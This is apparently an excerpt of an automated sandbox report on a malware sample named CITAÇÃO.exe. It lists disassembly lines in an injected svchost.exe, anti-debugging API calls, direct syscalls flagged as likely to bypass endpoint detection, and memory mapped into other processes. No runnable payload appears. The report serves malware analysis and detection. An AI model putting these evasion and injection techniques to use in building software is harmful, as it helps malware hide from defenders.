            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030304E5 mov ecx, dword ptr fs:[00000030h]1_2_030304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104B00 mov eax, dword ptr fs:[00000030h]1_2_03104B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]1_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]1_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]1_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]1_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]1_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]1_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]1_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]1_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FAB40 mov eax, dword ptr fs:[00000030h]1_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D8B42 mov eax, dword ptr fs:[00000030h]1_2_030D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028B50 mov eax, dword ptr fs:[00000030h]1_2_03028B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEB50 mov eax, dword ptr fs:[00000030h]1_2_030DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302CB7E mov eax, dword ptr fs:[00000030h]1_2_0302CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]1_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]1_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]1_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]1_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]1_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]1_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]1_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]1_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]1_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]1_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEBD0 mov eax, dword ptr fs:[00000030h]1_2_030DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]1_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]1_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]1_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EBFC mov eax, dword ptr fs:[00000030h]1_2_0305EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BCBF0 mov eax, dword ptr fs:[00000030h]1_2_030BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BCA11 mov eax, dword ptr fs:[00000030h]1_2_030BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA24 mov eax, dword ptr fs:[00000030h]1_2_0306CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EA2E mov eax, dword ptr fs:[00000030h]1_2_0305EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]1_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]1_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]1_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]1_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]1_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]1_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]1_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEA60 mov eax, dword ptr fs:[00000030h]1_2_030DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]1_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]1_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104A80 mov eax, dword ptr fs:[00000030h]1_2_03104A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068A90 mov edx, dword ptr fs:[00000030h]1_2_03068A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]1_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]1_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086AA4 mov eax, dword ptr fs:[00000030h]1_2_03086AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]1_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]1_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]1_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030AD0 mov eax, dword ptr fs:[00000030h]1_2_03030AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]1_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]1_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]1_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]1_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h]1_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h]1_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC912 mov eax, dword ptr fs:[00000030h]1_2_030BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028918 mov eax, dword ptr fs:[00000030h]1_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028918 mov eax, dword ptr fs:[00000030h]1_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B892A mov eax, dword ptr fs:[00000030h]1_2_030B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C892B mov eax, dword ptr fs:[00000030h]1_2_030C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0946 mov eax, dword ptr fs:[00000030h]1_2_030B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104940 mov eax, dword ptr fs:[00000030h]1_2_03104940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]1_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]1_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]1_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E mov eax, dword ptr fs:[00000030h]1_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E mov edx, dword ptr fs:[00000030h]1_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E mov eax, dword ptr fs:[00000030h]1_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h]1_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h]1_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC97C mov eax, dword ptr fs:[00000030h]1_2_030BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD mov eax, dword ptr fs:[00000030h]1_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD mov eax, dword ptr fs:[00000030h]1_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B89B3 mov esi, dword ptr fs:[00000030h]1_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h]1_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h]1_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C69C0 mov eax, dword ptr fs:[00000030h]1_2_030C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030649D0 mov eax, dword ptr fs:[00000030h]1_2_030649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA9D3 mov eax, dword ptr fs:[00000030h]1_2_030FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE9E0 mov eax, dword ptr fs:[00000030h]1_2_030BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h]1_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h]1_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC810 mov eax, dword ptr fs:[00000030h]1_2_030BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov ecx, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A830 mov eax, dword ptr fs:[00000030h]1_2_0306A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]1_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]1_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03042840 mov ecx, dword ptr fs:[00000030h]1_2_03042840
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe protection: execute and read and writeJump to behavior
